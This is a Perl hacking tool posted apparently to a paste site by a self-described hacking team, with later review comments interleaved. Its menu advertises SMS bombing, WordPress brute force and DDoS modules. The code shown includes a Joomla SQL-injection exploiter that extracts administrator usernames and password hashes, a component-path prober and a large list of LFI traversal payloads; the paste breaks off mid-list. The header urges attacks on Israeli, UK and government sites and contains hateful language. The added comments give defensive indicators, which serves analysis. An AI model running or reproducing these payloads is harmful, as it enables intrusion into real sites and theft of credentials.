Fallag_crx

KARTOUCH MultiSCanner (WP,Joomla)..

Aug 12th, 2017
Perl 191.48 KB | None | 0 0
  1. #!/usr/bin/perl
  2. #Salam 3alaykoum
  3. # !'m Fallagcrx From Tn Fallaga Team MEmbers | 2017 | #K4rT0uCh Pl = R3C0D3D By Me
  4. #[#]Find Shell/Admin Panel 's Link
  5. #[#]SC4N The SQLI
  6. #[#]JoomLa Componet Sc4nner / WPPlugin CHecker
  7. #[#]Lfi/Xss/RFi With Big Targets
  8. #[#]DDos Att4aCk |R3s3eve Ip :v
  9. #[#]SmS BomBer/ProXy Grabber
  10. # Free Palastine <3 Fuck Fuck Fuck Fuck Fuck Fuck Fuck Fuck Fuck Fuck Israel :v
  11. # Please Contact Me Or Donate Me In The Link :
  12. # Fb Link : http://www.facebook.com/X.cripton.x : Name : Mohamed Crx
  13. #Email : Fallag.crx@mail.ru | crx31824@gmail.com
  14. # My Youtube channel : Fallag crx
  15. # Thnx For All Muslimn Hackers :*
  16. #  (c) Copyright :/
  17. use HTTP::Request;
  18. use LWP::UserAgent;
  19. use Digest::MD5;
  20. use MIME::Base64;
  21. use LWP::Simple;
  22. use IO::Socket;
  23. use HTTP::Request::Common;
  24. use Term::ANSIColor;
  # Start-up banner and module menu. `cls` and `title` are cmd.exe built-ins, so
  # these two system() calls only have an effect on Windows; their return values
  # are not checked.
  25. system('cls');
  26. system('title Fallaga Team');
  27. print color("white"),"==========================================================\n";
  28. print color("red"),"      root@fallaga:~#perl kartouch.pl   \n";
  29. print color("red"),"      [+] Fallaga Team | Fallag crx  [+]      \n";
  30. print color("red"), "     Test it In co.il _ co.uk __ gov __ https *.* < try mdr >    \n";
  31. print color("white"), "==========================================================\n";
  # NOTE(review): the menu is the quickest capability summary for triage. It
  # advertises scanning, brute-force and DoS modules; only the branches for
  # options 15, 5 and 4 are visible in this part of the paste.
  32. print color("green"),"[1] Shell Finder\n";
  33. print color("green"),"[2] Admin Finder\n";
  34. print color("green"), "[3] Dorker Bing\n";
  35. print color("green"), "[4] Lfi Rfi Xss Scanner\n";
  36. print color("green"), "[5] Joomla Component Scanner\n";
  37. print color("green"), "[6] SMS Bomber\n";
  38. print color("green"), "[7] Proxy Grabber\n";
  39. print color("green"), "[8] Wordpress Plugin Checker\n";
  40. print color("green"), "[9] Jce Server Scanner\n";
  41. print color("green"), "[10] Md5 Cracker Online\n";
  42. print color("green"), "[11] FckEditor Dir Tester\n";
  43. print color("green"), "[12] Sqli Scanner\n";
  44. print color("green"), "[13] Wordpress Site Finder\n";
  45. print color("green"), "[14] Wordpress BruteFoce\n";
  46. print color("green"), "[15] Joomla Sql Injection Tester\n";
  47. print color("green"), "[16] DDOS\n";
  48. print color("green"), "[17] Reverse IP\n";
  49. print color("green"), "[1x] About Me\n\n";
  50. print "[+] Choose Number : ";
  # The bare <> operator reads from files named in @ARGV when there are any and
  # from STDIN otherwise. The chomped value is compared as a string ('15', '5',
  # '4', ...) by the if-blocks that follow.
  51. my $targett = <>;
  52. chomp $targett;
  # Menu option 15: sends SQL-injection test requests to a Joomla site, using
  # the @vuln and @sqli lists and the request loop that follow in this block.
  53. if($targett eq '15')
  54. {
  55. system('cls');
  56. system('title Joomla Sqli Injection Tester');
  # `use` is resolved at compile time, so these modules are loaded whichever
  # menu option is chosen; writing them inside the if-block does not make the
  # imports conditional.
  57. use LWP::Simple;
  58. use LWP::UserAgent;
  59. use HTTP::Cookies;
  60. use POSIX qw(strftime);
  61. use Term::ANSIColor qw(:constants);
  62.  
  # Clear the terminal with the command that matches the platform name in $^O.
  63. if($^O =~ /Win/){
  64. system("cls");
  65. }else{
  66. system("clear");
  67. }
  # $date is localtime() in scalar context (a printable timestamp string, later
  # written into the log text); the list-context call supplies the
  # $hour:$min:$sec fields shown in the start-up banner.
  68. my $date = localtime();
  69. my ($sec,$min,$hour,$day,$mon,$year,$wday,$yday,$isdst)=localtime(time);
  70. print RED, q {
  71.  
  72. W E _ K I L L _ A N N I M A L S
  73.  
  74. };
  75. print RESET;
  76.  
  # The first command-line argument is stored here, but $target is reassigned
  # from STDIN further down before any request is built from it.
  77. $target = $ARGV[0];
  78. #loooooooool :v
  # @vuln: request paths for Joomla components, each ending in a numeric
  # parameter that is set to a negative or otherwise out-of-range value. The
  # request loop appends an @sqli string directly after that value.
  # For defenders: these option=com_* / parameter pairs are what this module
  # leaves in web-server access logs, and any listed component still installed
  # on a site should be checked for an update or removed.
  # The com_tupinambis entry appears twice, so that request is sent twice.
  79. @vuln = (
  80. "/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1",
  81. "/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=-24",
  82. "/index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=-16",
  83. "/index.php?option=com_jvideoclip&view=search&type=user&uid=-1",
  84. "/index.php?option=com_mamml&listid=-1",
  85. "/index.php?option=com_fq&Itemid=3&listid=-9999999",
  86. "/index.php?option=com_listing&task=browse&category_id=-1",
  87. "/index.php?option=com_techfolio&view=techfoliodetail&catid=-1",
  88. "/index.php?option=com_tupinambis&task=verproyecto&proyecto=-1",
  89. "/index.php?option=com_tupinambis&task=verproyecto&proyecto=-1",
  90. "/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=2&cat_id=-1",
  91. "/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-1",
  92. "/index.php?option=com_clasifier&Itemid=1&cat_id=-1",
  93. "/index.php?option=com_jooget&Itemid=2&task=detail&id=-1",
  94. "/index.php?option=com_galeria&Itemid=7&func=detail&id=-1",
  95. "/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=-1",
  96. "/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=1&tid=-1",
  97. "/index.php?option=com_quiz&task=user_tst_shw&Itemid=1&tid=-1",
  98. "/index.php?option=com_xfaq&task=answer&Itemid=1&catid=97&aid=-1",
  99. "/index.php?option=com_gallery&Itemid=0&func=detail&id=-1",
  100. "/index.php?option=com_rapidrecipe&page=showuser&user_id==1",
  101. "/index.php?option=com_downloads&Itemid=10&func=selectfolder&filecatid=-1",
  102. "/index.php?option=com_shambo2&Itemid=-1",
  103. "/index.php?option=com_neoreferences&Itemid=27&catid=-1",
  104. "/index.php?option=com_akogallery&Itemid=11&func=detail&id=-1",
  105. "/index.php?option=com_catalogshop&Itemid=13&func=detail&id=-1",
  106. "/index.php?option=com_restaurant&Itemid=10&func=detail&id=-1",
  107. "/index.php?option=com_musepoes&task=answer&Itemid=1&catid=2&aid=-1",
  108. "/index.php?option=com_recipes&Itemid=2&func=detail&id=-1",
  109. "/index.php?option=com_jokes&Itemid=1&func=CatView&cat=-1",
  110. "/index.php?option=com_estateagent&Itemid=21&func=showObject&info=contact&objid=-1",
  111. "/index.php?option=com_newsletter&Itemid=1&listid=-9999999"
  112. );
  # @sqli: only the first string is active; the remaining entries are commented
  # out. The active string is a UNION SELECT that names the jos_users table and
  # its usertype/username/password columns, so a query string containing
  # "union", "select" and "_users" together is a usable WAF/IDS signature for
  # this traffic. The durable fix is on the server side: component code that
  # binds the numeric parameter instead of concatenating it into SQL.
  113. @sqli = ('+union+all+select+1,concat_ws(0x3a,usertype,username,password),3,4,5,6,7,8,9+from+jos_users'
  114. #,'/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*'
  115. #,'/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/jos)users/*'
  116. #,'/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*'
  117. #,'/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*'
  118. #,'+union+select+1,2,3,concat_ws(0x3a,username,password)fallag,5,6,7,8,9,10,11+from+mos_users--'
  119. #,'+union+select+1,2,3,concat_ws(0x3a,username,password)fallag,5,6,7,8,9,10,11+from+jos_users--'
  120. );
  # Module banner, printed before the target prompt.
  121. print GREEN, q(
  122.  Joomla SQLi Exploiter
  123.  Contact me at : fallag.crx@mail.ru
  124.  crx Team Here!!
  125. );
  # Strips a trailing newline from the value copied from $ARGV[0]; that value is
  # replaced by the STDIN read two statements later.
  126. chomp $target;
  127.  
  # The target host is read from STDIN and used as typed: no validation or
  # normalisation is applied before it is concatenated into request URLs.
  128. print "[+] Enter Joomla Site: ";
  129. chomp ($target = <STDIN>);
  130. print RESET;
  # Status banner only: echoes the target and the start time captured earlier.
  131. print YELLOW, "-----------------------------------------------------------------------------------------------
  132. [!] Atacking info
  133. -----------------------------------------------------------------------------------------------
  134. [!] Target  : $target
  135. [!] Method  : SQL injection
  136. [!] Started : $hour:$min:$sec\n";
  137. print "-----------------------------------------------------------------------------------------------
  138. [!] Exploiting $target...
  139. [!] Please wait bitch!\n";
  140. print RESET;
  # Request loop: one GET per (@vuln path, @sqli string) pair, always over plain
  # http://. A new LWP::UserAgent and a new cookie jar are created on every
  # iteration.
  141. foreach $vuln(@vuln){
  142. foreach $sqli(@sqli){
  143. $expl = "http://" . $target . $vuln . $sqli;
  144. $req   = HTTP::Request->new(GET=>$expl);
  145. $ua = LWP::UserAgent->new(keep_alive => 1);
  # Network indicator: every request carries this fixed, dated Firefox 3.6.12 /
  # Windows NT 5.1 User-Agent string.
  146. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12");
  147. $ua->timeout (10);
  # Host artifact: cookies are saved to cookies.txt in the current working
  # directory (autosave is enabled).
  148. $ua->cookie_jar(
  149. HTTP::Cookies->new(
  150. file => 'cookies.txt',
  151. autosave => 1
  152. )
  153. );
  154. $res = $ua->request($req);
  155. if ($res->is_success) {
  # $res is reused: the response object is overwritten with its body text.
  156. $res   = $res->content;
  # A hit is declared only when the body contains the literal "Administrator:"
  # followed by two colon-separated fields; the first capture is what gets
  # printed and logged.
  157. if ($res =~ /Administrator:(.*):(.*)/) {
  158. #if ($res =~ m/:/g) {
  159. ($user) = ($1);
  160. my ($sec,$min,$hour)=localtime();
  161. print "-----------------------------------------------------------------------------------------------";
  162. print GREEN, "
  163. [$hour:$min:$sec]
  164. [+] Exploit Succes !";
  165. print ON_BLUE, GREEN, "
  166. [+] $user\n";
  # Host artifact: the full request URL and the captured string are appended to
  # the dated SQLi.log file by printlog().
  167. printlog ("
  168. Joomla SQLi Log
  169. Date     : $date
  170. Target   : $expl
  171. Exploit  : $user\n
  172. ");
  173. print RESET;
  174. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
  175. print RESET;
  # The script stops at the first hit; remaining paths are not requested.
  176. exit;
  177. }
  178. }
  179. }}
  # Reached only when no response matched: prints a timestamped failure notice.
  180. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
  181. print RESET;
  182. my ($sec,$min,$hour)=localtime();
  183. print BLUE, "[$hour:$min:$sec]
  184. [-] Exploit SQLi at $target failed! \n";
  185. print RESET;
  186. print YELLOW, "-----------------------------------------------------------------------------------------------\n";
  187.  
  # printlog(TEXT): appends its first argument to a per-day log file named
  # "[<logdir><year>-<mon>-<mday>]SQLi.log" and dies if the file cannot be opened.
  # Named subs are defined at compile time, so printlog exists even though it is
  # written inside the option-15 if-block.
  188. sub printlog
  189. {
  190. my ($logsec,$logmin,$loghour,$logmday,$logmon,$logyear,$logwday,$logyday,$logisdst)=localtime(time);
  # $logtimestamp is built here but not used in the rest of the sub.
  191. my $logtimestamp = sprintf("%4d-%02d-%02d,%02d:%02d:%02d",$logyear+1900,$logmon+1,$logmday,$loghour,$logmin,$logsec);
  192. $logmon++;
  193. $logyear=$logyear+1900;
  # NOTE(review): $logdir has no assignment in the visible part of the file; if it
  # is unset it interpolates as an empty string and the log lands in the current
  # working directory. Month and day are not zero-padded in the file name.
  194. my $log="[$logdir$logyear-$logmon-$logmday]SQLi.log";
  # Two-argument open on a bareword handle, append mode.
  195. open(lo,">>$log") or die "$log:$!";
  # @_[0] is a one-element slice of the argument list, i.e. the first argument.
  196. print lo @_[0];
  197. close(lo);
  198. return;
  # The second brace closes the option-15 if-block.
  199. }}
  # Menu option 5: probes a site for the Joomla component directories listed in
  # @path and records the responses that succeed in com.txt.
  200. if($targett eq '5')
  201. {
  202. system('cls');
  203. system('title Joomla Component Scanner');
  # The package statement applies to the rest of this enclosing block, so the
  # unqualified globals used below ($site, @path, $url, ...) belong to package
  # `control` rather than `main`.
  204. package control;
  205. use HTTP::Request;
  206. use LWP::UserAgent;
  207.  
  # cls, title and color are Windows console commands; return values are ignored.
  208. system('cls');
  209. system(' Title Files and Directory Scanner ');
  210. system "color a";
  211. print"\n";
  212. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
  213. print "\t>                    Joomla Component Scanner                      >\n";
  214. print "\t>                                                                  >\n";
  215. print "\t>                        Fallag crx                        >\n";
  216. print "\t>           fallaga Team | crypton_x               >\n";
  217. print "\t>                         Result In com.txt                        >\n";
  218. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
  219. print "\n";
  220.  
  221. print " Scan Your site Site\n\n Example: www.victim.com \n\n-> ";
  222.  
  223.  
  # The site is read from STDIN without validation.
  224. $site=<STDIN>;
  225. chomp $site;
  226.  
  # If the input does not contain "http://" anywhere (the pattern is unanchored),
  # it is wrapped as "http://<input>/". Every @path entry starts with "/", so the
  # requests built from a wrapped value carry a double slash ("//components/...")
  # in the request path, which is a recognisable pattern in access logs.
  227. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  228.  
  229. print "\n";
  # @path: wordlist of Joomla component directories, requested one by one in
  # the loop that follows the list.
  # For defenders: a burst of GET requests for /components/com_* directories
  # from one client is the footprint of this module. Several entries are
  # malformed (for example '/components/com_/components/community' and
  # '/components/com_ms/components/comment'), apparently from a search-and-replace
  # applied to the list; no real component lives at those paths, so a request
  # for one of them is a high-confidence indicator of this wordlist.
  # Some entries are duplicated (com_jmsfileseller, com_jtickets, com_jinc).
  230. @path = ('/components/com_tag',
  231. '/components/com_virtuemart',
  232. '/components/com_jvehicles',
  233. '/components/com_s5clanroster',
  234. '/components/com_fireboard',
  235. '/components/com_fabrik',
  236. '/components/com_jinc',
  237. '/components/com_xcloner-backupandrestore',
  238. '/components/com_dshop',
  239. '/components/com_ponygallery',
  240. '/components/com_bearleague',
  241. '/components/com_obsuggest',
  242. '/components/com_alameda',
  243. '/components/com_estateagent',
  244. '/components/com_collector',
  245. '/components/com_qcontacts',
  246. '/components/com_niceajaxpoll',
  247. '/components/com_xmap',
  248. '/components/com_team',
  249. '/components/com_joomnik',
  250. '/components/com_question',
  251. '/components/com_jmsfileseller',
  252. '/components/com_rsfiles',
  253. '/components/com_versioning',
  254. '/components/com_hello',
  255. '/components/com_calcbuilder',
  256. '/components/com_jmsfileseller',
  257. '/components/com_xmovie',
  258. '/components/com_people',
  259. '/components/com_idoblog',
  260. '/components/com_adsmanager',
  261. '/components/com_xgallery',
  262. '/components/com_alfurqan15x',
  263. '/components/com_alfurqan',
  264. '/components/com_billyportfolio',
  265. '/components/com_jimtawl',
  266. '/components/com_content',
  267. '/components/com_jfuploader',
  268. '/components/com_kunena',
  269. '/components/com_jooproperty',
  270. '/components/com_jsupport',
  271. '/components/com_markt',
  272. '/components/com_img',
  273. '/components/com_clanlist',
  274. '/components/com_clan',
  275. '/components/com_ckforms',
  276. '/components/com_dcnews',
  277. '/components/com_connect',
  278. '/components/com_rsappt_pro2',
  279. '/components/com_techfolio',
  280. '/components/com_zcalendar',
  281. '/components/com_tpjobs',
  282. '/components/com_simpleshop',
  283. '/components/com_sef',
  284. '/components/com_searchlog',
  285. '/components/com_contact',
  286. '/components/com_enmasse',
  287. '/components/com_elite_experts',
  288. '/components/com_ezautos',
  289. '/components/com_jgen',
  290. '/components/com_jphone',
  291. '/components/com_mosets',
  292. '/components/com_jefaqpro',
  293. '/components/com_picsell',
  294. '/components/com_ongallery',
  295. '/components/com_equipment',
  296. '/components/com_zoomportfolio',
  297. '/components/com_amblog',
  298. '/components/com_joltcard',
  299. '/components/com_jp_jobs',
  300. '/components/com_bfquiztrial',
  301. '/components/com_qpersonel',
  302. '/components/com_pandafminigames',
  303. '/components/com_golfcourseguid',
  304. '/components/com_jejob',
  305. '/components/com_jeajaxeventcalendar',
  306. '/components/com_jradio',
  307. '/components/com_spidercatalog',
  308. '/components/com_/components/commedia',
  309. '/components/com_fss',
  310. '/components/com_icagenda',
  311. '/components/com_spidercalendar',
  312. '/components/com_joomgalaxy',
  313. '/components/com_ornekek',
  314. '/components/com_weblinks',
  315. '/components/com_rokmodule',
  316. '/components/com_discussions',
  317. '/components/com_hm/components/community',
  318. '/components/com_eslamiat',
  319. '/components/com_listing',
  320. '/components/com_jeemasms',
  321. '/components/com_yjcontactus',
  322. '/components/com_timereturns',
  323. '/components/com_jce',
  324. '/components/com_joomtouch',
  325. '/components/com_jdirectory',
  326. '/components/com_jesubmit',
  327. '/components/com_sobi2',
  328. '/components/com_acooldebate',
  329. '/components/com_booklibrary',
  330. '/components/com_acymailing',
  331. '/components/com_doqment',
  332. '/components/com_allcinevid',
  333. '/components/com_jotloader',
  334. '/components/com_jeauto',
  335. '/components/com_ccboard',
  336. '/components/com_ccinvoices',
  337. '/components/com_flipwall',
  338. '/components/com_sponsorwall',
  339. '/components/com_cbe',
  340. '/components/com_jscalendar',
  341. '/components/com_restaurantguide',
  342. '/components/com_nkc',
  343. '/components/com_aardvertiser',
  344. '/components/com_clantools',
  345. '/components/com_remository',
  346. '/components/com_dateconverter',
  347. '/components/com_wmtpic',
  348. '/components/com_donateprocess',
  349. '/components/com_gamesbox',
  350. '/components/com_jcafe',
  351. '/components/com_awd_song',
  352. '/components/com_picasa2gallery',
  353. '/components/com_ybggal',
  354. '/components/com_joomdocs',
  355. '/components/com_answers',
  356. '/components/com_galleryxml',
  357. '/components/com_oziogallery2',
  358. '/components/com_listbingo',
  359. '/components/com_easygb',
  360. '/components/com_jtickets',
  361. '/components/com_jesectionfinder',
  362. '/components/com_realtyna',
  363. '/components/com_/components/community',
  364. '/components/com_jomestate',
  365. '/components/com_jtickets',
  366. '/components/com_cinema',
  367. '/components/com_jstore',
  368. '/components/com_annonces',
  369. '/components/com_lead',
  370. '/components/com_sar_news',
  371. '/components/com_chronocontact',
  372. '/components/com_chronoconnectivity',
  373. '/components/com_djartgallery',
  374. '/components/com_quran',
  375. '/components/com_g2bridge',
  376. '/components/com_reservations',
  377. '/components/com_jepoll',
  378. '/components/com_mycar',
  379. '/components/com_mediqna',
  380. '/components/com_zelig',
  381. '/components/com_bookmarks',
  382. '/components/com_hotproperty',
  383. '/components/com_jombib',
  384. '/components/com_store',
  385. '/components/com_mosforms',
  386. '/components/com_/components/comprofiler',
  387. '/components/com_crowdsource',
  388. '/components/com_camp',
  389. '/components/com_ms/components/comment',
  390. '/components/com_extcalendar',
  391. '/components/com_imoti',
  392. '/components/com_product',
  393. '/components/com_event',
  394. '/components/com_simpledownload',
  395. '/components/com_news',
  396. '/components/com_article',
  397. '/components/com_jequoteform',
  398. '/components/com_konsultasi',
  399. '/components/com_sebercart',
  400. '/components/com_php',
  401. '/components/com_jinc',
  402. '/components/com_mytube',
  403. '/components/com_jbudgetsmagic',
  404. '/components/com_surveymanager',
  405. '/components/com_jreservation',
  406. '/components/com_foobla_suggestions',
  407. '/components/com_djcatalog',
  408. '/components/com_turtushout',
  409. '/components/com_alphauserpoints',
  410. '/components/com_lucygames',
  411. '/components/com_bfsurvey_profree',
  412. '/components/com_tpdugg',
  413. '/components/com_joomloc',
  414. '/components/com_joomlub',
  415. '/components/com_artportal',
  416. '/components/com_agora',
  417. '/components/com_gameserver',
  418. '/components/com_digifolio',
  419. '/components/com_bca-rss-syndicator',
  420. '/components/com_expose',
  421. '/components/com_equotes',
  422. '/components/com_media',
  423. '/components/com_misterestate',
  424. '/components/com_wrapper',
  425. '/components/com_mailto',
  426. '/components/com_autartimonial',
  427. '/components/com_artforms',
  428. '/components/com_redshop',
  429. '/components/com_staticxt',
  430. '/components/com_spa',
  431. '/components/com_jomtube',
  432. '/components/com_golfcourseguide',
  433. '/components/com_huruhelpdesk',
  434. '/components/com_joomdle',
  435. '/components/com_youtube',
  436. '/components/com_joomla-visites',
  437. '/components/com_ttvideo',
  438. '/components/com_appointinator',
  439. '/components/com_photomapgallery',
  440. '/components/com_spielothek',
  441. '/components/com_pbbooking',
  442. '/components/com_beamospetition',
  443. '/components/com_neorecruit',
  444. '/components/com_cgtestimonial',
  445. '/components/com_jgrid',
  446. '/components/com_zina',
  447. '/components/com_pro_desk',
  448. '/components/com_user',
  449. '/components/com_k2',
  450. '/components/com_rsbook_15',
  451. '/components/com_gk3_photoslide',
  452. '/components/com_jvideodirect',
  453. '/components/com_jcalpro',
  454. '/components/com_banners',
  455. '/components/com_datsogallery',
  456. '/components/com_joomradio',
  457. '/components/com_jfbconnect',
  458. '/components/com_myblog',
  459. '/components/com_phocamaps',
  460. '/components/com_contact_enhanced',
  461. '/components/com_aicontactsafe',
  462. '/components/com_poll',);
  463.  
  464.  
  # Probe loop: one GET per @path entry against the entered site.
  # $com aliases the current @path element, so the assignment to $com inside the
  # loop also rewrites that element of @path.
  465. foreach $com(@path){
  466.  
  467. $url = $site.$com;
  468. $req = HTTP::Request->new(GET=>$url);
  # Network indicator: no agent() call is made, so requests go out with LWP's
  # default User-Agent ("libwww-perl/<version>"). A new agent object is built on
  # every iteration.
  469. $useragent = LWP::UserAgent->new();
  470.  
  471. $response = $useragent->request($req);
  472.  
  # Any successful final status counts as "found". A server that answers unknown
  # /components/* paths with 404/403 rather than a 200 page gives this check
  # nothing to report.
  473. if ($response->is_success){
  474. print "$com\n";
  # NOTE(review): `$com + 13` evaluates a path string in numeric context, so the
  # offset looks like it is always 13 and $url becomes the tail of the URL; the
  # next line then cuts at the first '"' in that tail. What lands in com.txt is
  # this derived string, not the original path -- confirm against a sample
  # com.txt when analysing one.
  475.  $url = substr($url, $com + 13);
  476.  $com = substr($url, 0, index($url, '"'));
  # Host artifact: results are appended to com.txt in the current working
  # directory; the open() result is not checked.
  477.  open (txt,">>com.txt");
  478.  print txt  $com,"\n";
  479.  close(txt);
  480. print "=> Dir Found : $url\n";
  481. }
  482. else {
  483. print "=> Not Found : $com\n";
  484. }}
  # Closes the option-5 if-block.
  485. }
  486.  
  487. if($targett eq '4')
  488. {
  489. system('cls');
  490. system('title Lfi Rfi Xss Scanner');
  491.                     {
  492. use LWP::Simple;
  493. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  494. print "#############################################################";
  495. print "\n\t\t Fallaga Scanner [XSS - LFI - RFI]";
  496. print "\n\t\t <<<  Fallaga | Team  >>>";
  497. print "\n\t\t ReCode By Fallag crx";
  498. sleep (1);
  499. print "\n\n\t\t crypton_x Menu ";
  500. print "\n \t\t 1- XSS SCAN ";
  501. print "\n \t\t 2- LFI SCAN ";
  502. print "\n \t\t 3- RFI SCAN (FOR JOOMLA) ";
  503. print "\n \t\t 4- XSS & LFI ";
  504. print  "\n\n \t\t 5- Exit\n";
  505. print "\n Choose :";
  506. $ID =<STDIN>;
  507. ######
  508. @LFI =("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F.
.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../..
/../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F